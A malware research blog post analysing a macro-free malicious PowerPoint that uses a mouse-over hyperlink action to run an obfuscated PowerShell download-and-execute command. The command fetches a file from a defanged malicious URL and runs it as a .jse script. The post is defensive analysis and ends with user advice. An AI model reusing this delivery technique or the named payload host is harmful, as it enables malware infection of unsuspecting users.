CSP-CERT® Malware Research:
Malicious PowerPoint: Macro Alternative

by CSP-CERT® Research Science
posted June 2017

If you have worked in security, or are conscious about security, then you probably already know that most of the malicious documents in the wild work through either some form of vulnerability that is exploited or an embedded macro that is malicious (this is the most common scenario).

However, CSP CERT® received reports about a malicious PowerPoint document that was being spread via email that does not use macro at all. The sample works by abusing the link action feature of PowerPoint.

Upon opening the PowerPoint, you get to see 1 slide as seen below.

Note that the malicious action will not be triggered unless you do two actions:

  1. Run the slideshow
  2. Mouse over the hyperlink

When you do the actions above, the malicious action will be triggered but PowerPoint will show a notice first, much like how it shows a notice on macro embedded documents.

Looking at the notice below, PowerPoint warns you that a possible malicious action is about to occur. Clicking disable will nullify the attack, and clicking enable will instruct PowerPoint to continue running the external application, just like when a macro needs to be enabled first for it to run. In this case it will execute PowerShell with a command to download and execute a file named ii.jse (JavaScript Encoded file).

How does this work? PowerPoint has a feature to add actions to an object, either by clicking or by mouse over.

To see the action performed on our sample, you can right click it and choose Hyperlink.

This will show you the actions that will be performed by the object which in our case is to execute PowerShell upon mouse over.

The PowerShell command that will be executed is the typical download and execute one liners that you see in some macro embedded documents.

"+[char] 0x2F" coincides to a slash (/) so when cleaned up.

Note: http is replaced by hxxp

The line consists of two commands.

The download command which downloads hxxp://cccn.nl/c.php and saves it as ii.jse.

The execute command using Invoke-Item

Malicious actors are creative and will continue to find innovative ways to run their code. As seen above, the malware author just took advantage of a legitimate feature of PowerPoint to download and execute code without needing macros. This means that it can potentially bypass your email security and anti-virus solutions because 1.) there is no macro involved and 2.) no vulnerability is exploited.

To prevent falling victim to this attack, always check what actions are taking place. The Microsoft Notice is there for a reason, don’t mindlessly click enable. Also, when unsure, it is always better to click disable and then investigate further, rather than clicking enable/yes and then regret it.